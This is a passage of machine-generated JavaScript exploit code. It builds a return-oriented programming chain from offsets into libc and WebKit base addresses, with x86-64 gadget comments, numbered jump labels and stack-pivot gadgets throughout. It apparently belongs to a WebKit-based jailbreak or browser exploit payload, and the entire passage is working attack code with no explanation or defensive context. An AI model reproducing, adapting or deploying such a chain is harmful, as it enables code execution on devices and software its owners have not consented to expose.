libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+224632, //L3946 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3946: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+224688, //L3947 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3947: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+224824, //L3951 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+224808, //L3950 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3949: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3950: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3951: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+224928, //L3954 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+224960, //L3956 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3953: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3954: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3955: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3956: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+225072, //L3957+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+225064, //L3957 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3957: db([0, 0]); // 0x0 set_gadgets([ ropchain+225088, //L3957+24 ropchain+226480, //L3952 libc_base+764760, //pop rsi ropchain+225128, //L3958 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3958: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3960: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+225248, //L3963 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+225232, //L3961 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3961: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3963: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+225392, //L3966 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+225360, //L3964 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+225376, //L3965 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3964: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3965: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3966: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+225472, //L3967 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3967: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3969: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+225592, //L3972 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+225576, //L3970 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3970: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3972: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+225768, //L3975 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi 
ropchain+225784, //L3976 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+225736, //L3973 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+225752, //L3974 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3973: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3974: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3975: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3976: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+225944, //L3980 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+225912, //L3978 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+225928, //L3979 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3977: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3978: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3979: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3980: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+226032, //L3981 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+226048, //L3982 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3981: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3982: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al 
webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+226224, //L3984 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+226240, //L3985 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+226208, //L3983 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3983: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3984: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3985: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+226384, //L3988 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+226400, //L3989 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+226352, //L3986 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3986: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3987: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3988: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3989: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+226472, //L3990 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3990: db([0, 0]); // 0x0 //L3952: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+226600, //L3993 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+226616, //L3994 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi 
libc_base+764760, //pop rsi ropchain+226584, //L3992 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3992: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3993: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3994: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+226776, //L3999 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+226792, //L4000 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+226728, //L3996 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3996: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3997: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3998: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3999: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4000: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+226904, //L4001+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+226896, //L4001 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4001: db([0, 0]); // 0x0 set_gadgets([ ropchain+226920, //L4001+24 ropchain+227872, //L3995 libc_base+764760, //pop rsi ropchain+226960, //L4002 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4002: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4004: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+227080, //L4007 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+227064, //L4005 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4005: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4007: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+227224, //L4010 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+227192, //L4008 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+227208, //L4009 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4008: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4009: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4010: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+227320, //L4012 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4011: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4012: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4013: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+227424, //L4014 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+227440, //L4015 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4014: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4015: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ 
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+227616, //L4017 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+227632, //L4018 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+227600, //L4016 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4016: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4017: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4018: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+227776, //L4021 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+227792, //L4022 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+227744, //L4019 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4019: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4020: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4021: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4022: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+227864, //L4023 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4023: db([0, 0]); // 0x0 //L3995: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+227992, //L4026 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+228008, 
//L4027 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+227976, //L4025 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4025: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4026: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4027: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+228120, //L4029 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+228168, //L4032 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+228136, //L4030 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4029: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4030: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4031: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4032: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+228280, //L4033+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+228272, //L4033 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4033: db([0, 0]); // 0x0 set_gadgets([ ropchain+228296, //L4033+24 ropchain+230320, //L4028 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+228336, //L4034 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4034: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4035: db([48, 0]); // 0x30 set_gadget(libc_base+144605,); //pop rdi //L4036: db([48, 0]); // 0x30 set_gadgets([ webkit_base+15691302, //movsxd rax, edi 
libc_base+764760, //pop rsi ropchain+228528, //L4040 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+228496, //L4038 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+228512, //L4039 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4037: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4038: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4039: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4040: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+228584, //L4042 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4042: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+228712, //L4044 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+228728, //L4045 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+228696, //L4043 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4043: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4044: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4045: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+228824, //L4047 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+228808, //L4046 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4046: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4047: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 
set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+228904, //L4048 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4048: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4050: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+229024, //L4053 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+229008, //L4051 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4051: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4053: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+229168, //L4056 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+229136, //L4054 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+229152, //L4055 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4054: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4055: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4056: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+229240, //L4058 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4058: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+229296, //L4059 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4059: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+229376, //L4061 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4061: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4063: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+229496, //L4066 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+229480, //L4064 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4064: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4066: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+229640, //L4069 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+229608, //L4067 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+229624, //L4068 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4067: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4068: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4069: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+229728, //L4071 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4070: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L4071: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+229784, //L4072 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4072: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4074: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+229864, //L4076 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4076: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+229968, //L4077 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+229984, //L4078 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4077: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4078: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+230072, //L4080 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4080: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+230128, //L4081 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4081: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+230200, //L4084 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4084: db([0, 0]); // 0x0 
set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+230256, //L4085 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4085: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+230336, //L4087 //L4028: libc_base+782311, //pop rsp ropchain+230352, //L4088 //L4087: libc_base+782311, //pop rsp ropchain+223984, //L3929 //L4088: //L3641: libc_base+764760, //pop rsi ropchain+230392, //L4089 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4089: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4091: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+230512, //L4094 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+230496, //L4092 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4092: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4094: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+230688, //L4097 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+230704, //L4098 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+230656, //L4095 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+230672, //L4096 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4095: db([0, 0]); // 0x0 
